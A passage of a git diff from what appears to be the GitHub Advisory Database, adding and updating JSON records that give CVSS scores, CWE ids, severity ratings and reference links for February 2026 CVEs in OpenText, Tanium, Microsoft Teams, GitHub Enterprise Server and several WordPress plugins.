"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:D/RE:H/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9208" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm/en?id=ot_kb_unauthenticated&sysparm_article=KB0854844" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json b/advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json new file mode 100644 index 0000000000000..5e76bb063e8b9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fj3r-hwrr-xqfr", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-2350" + ], + "details": "Tanium addressed an insertion of sensitive information into log file vulnerability in Interact and TDS.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2350" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-008" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json b/advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json new file mode 100644 index 0000000000000..b37a08cf52988 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqr4-q363-g7gm", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2025-13671" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in OpenText™ Web Site Management Server allows Cross Site Request Forgery. The vulnerability could make a user, with active session inside the product, click on a page that contains this malicious HTML triggering to perform changes unconsciously.\n\nThis issue affects Web Site Management Server: 16.7.0, 16.7.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:D/RE:H/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13671" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm/en?id=ot_kb_unauthenticated&sysparm_article=KB0854846" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json b/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json index 9901ffe51d657..47f1a281eb1b3 100644 --- a/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json +++ b/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fv8p-2x46-62xh", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25321" ], "details": "Missing Authorization vulnerability in PSM Plugins SupportCandy supportcandy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SupportCandy: from n/a through <= 3.4.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json b/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json index 06b5a4ffceccc..9143cd631403f 100644 --- a/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json +++ b/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fw5x-26p7-22pv", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25319" ], "details": "Cross-Site Request Forgery (CSRF) vulnerability in wpzita Zita Elementor Site Library zita-site-library allows Cross Site Request Forgery.This issue affects Zita Elementor Site Library: from n/a through <= 1.6.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json b/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json index b49fe96911a14..0d9d496762c1a 100644 --- a/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json +++ b/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-g6g2-qr88-w8qf", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23804" ], "details": "Missing Authorization vulnerability in BBR Plugins Better Business Reviews better-business-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Business Reviews: from n/a through <= 0.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json b/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json index 76d952dada47d..e18e5816cf70a 100644 --- a/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json +++ b/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hm7p-gwh2-3jfm", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25348" ], "details": "Missing Authorization vulnerability in alttextai Download Alt Text AI alttext-ai allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download Alt Text AI: from n/a through <= 1.10.15.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json b/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json index 53851fad426db..894c7fa71e52e 100644 --- a/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json +++ b/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jwh4-2xr6-36qf", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-25000" ], "details": "Missing Authorization vulnerability in Kraft Plugins Wheel of Life wheel-of-life allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wheel of Life: from n/a through <= 1.2.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json b/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json index 141963a50a5a3..f028033f7d69b 100644 --- a/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json +++ b/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m5w7-8p57-p7r3", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25325" ], "details": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in rtCamp rtMedia for WordPress, BuddyPress and bbPress buddypress-media allows Retrieve Embedded Sensitive Data.This issue affects rtMedia for WordPress, BuddyPress and bbPress: from n/a through <= 4.7.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-497" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json index dcb5ba7c92618..99f0b7c0423c6 100644 --- a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json +++ b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p546-7whm-cxpm", - "modified": "2026-02-18T21:31:23Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-18T21:31:23Z", "aliases": [ "CVE-2026-0573" ], "details": "An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json index 215dd0cf5c429..49934160ef248 100644 --- a/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json +++ b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pmfh-36xp-5j94", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25314" ], "details": "Missing Authorization vulnerability in WP Messiah TOP Table Of Contents top-table-of-contents allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TOP Table Of Contents: from n/a through <= 1.3.31.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json index 300677a04c037..a9069aad439a0 100644 --- a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json +++ b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qrj7-4954-7p6v", - "modified": "2026-02-18T21:31:23Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-18T21:31:23Z", "aliases": [ "CVE-2026-1999" ], "details": "An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to merge their own pull request into a repository without having push access by exploiting an authorization bypass in the enable_auto_merge mutation for pull requests. This issue only affected repositories that allow forking as the attack relies on opening a pull request from an attacker-controlled fork into the target repository. Exploitation was only possible in specific scenarios. It required a clean pull request status and only applied to branches without branch protection rules enabled. This vulnerability affected GitHub Enterprise Server versions prior to 3.19.2, 3.18.5, and 3.17.11, and was fixed in versions 3.19.2, 3.18.5, and 3.17.11. This vulnerability was reported via the GitHub Bug Bounty program.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json new file mode 100644 index 0000000000000..c293e49d3b5a5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m5-gc42-8vvh", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2025-8055" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in OpenText™ XM Fax allows Server Side Request Forgery. \n\nThe vulnerability could allow an attacker to\n\n\n\nperform blind SSRF to other systems accessible from the XM Fax server.\n\nThis issue affects XM Fax: 24.2.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8055" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0847038" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json index 5e7c2d3cb0772..8845ecb3b866e 100644 --- a/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json +++ b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r7pc-wm4g-53rv", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-27056" ], "details": "Missing Authorization vulnerability in StellarWP iThemes Sync ithemes-sync allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects iThemes Sync: from n/a through <= 3.2.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:26Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json new file mode 100644 index 0000000000000..1769c08ffd852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx38-cw65-cmwp", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-21535" + ], + "details": "Improper access control in Microsoft Teams allows an unauthorized attacker to disclose information over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21535" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21535" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json new file mode 100644 index 0000000000000..187b30ffa115c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9fg-2h32-5478", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-2435" + ], + "details": "Tanium addressed a SQL injection vulnerability in Asset.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2435" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json index 9ba5ef7049161..6575115526aed 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json +++ b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xfv7-f3m9-5h58", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-25003" ], "details": "Missing Authorization vulnerability in madalin.ungureanu Client Portal client-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Client Portal: from n/a through <= 1.2.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json index 90b9dfb485ebc..7c50124160162 100644 --- a/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json +++ b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xgvq-3q42-wr4g", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23549" ], "details": "Deserialization of Untrusted Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Object Injection.This issue affects WpEvently: from n/a through <= 5.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:12Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json index 6856e10f10531..0af14e86b4560 100644 --- a/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json +++ b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xmxf-f859-45ch", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25333" ], "details": "Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through <= 1.0.11.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json index ddd4d8a099a4a..a5f3bc22e464e 100644 --- a/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json +++ b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xprw-mh67-9xf5", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23544" ], "details": "Deserialization of Untrusted Data vulnerability in codetipi Valenti valenti allows Object Injection.This issue affects Valenti: from n/a through <= 5.6.3.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:12Z" From 03399a29925cfd9d5aef34732fec893de656f215 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 03:33:02 +0000 Subject: [PATCH 02/77] Publish Advisories GHSA-5pfr-259p-873j GHSA-658m-53rw-9pgg GHSA-7jwr-q23r-96hf GHSA-8823-cww3-2gv3 GHSA-8f5v-g9hx-qc4q GHSA-p3p8-xvrh-mwgr GHSA-vvcr-j24q-wc29 GHSA-xj5x-4c9j-jr89 --- .../GHSA-5pfr-259p-873j.json | 36 ++++++++++++ .../GHSA-658m-53rw-9pgg.json | 56 +++++++++++++++++++ .../GHSA-7jwr-q23r-96hf.json | 56 +++++++++++++++++++ .../GHSA-8823-cww3-2gv3.json | 44 +++++++++++++++ .../GHSA-8f5v-g9hx-qc4q.json | 48 ++++++++++++++++ .../GHSA-p3p8-xvrh-mwgr.json | 36 ++++++++++++ .../GHSA-vvcr-j24q-wc29.json | 36 ++++++++++++ .../GHSA-xj5x-4c9j-jr89.json | 36 ++++++++++++ 8 files changed, 348 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-5pfr-259p-873j/GHSA-5pfr-259p-873j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-658m-53rw-9pgg/GHSA-658m-53rw-9pgg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7jwr-q23r-96hf/GHSA-7jwr-q23r-96hf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8823-cww3-2gv3/GHSA-8823-cww3-2gv3.json create mode 100644 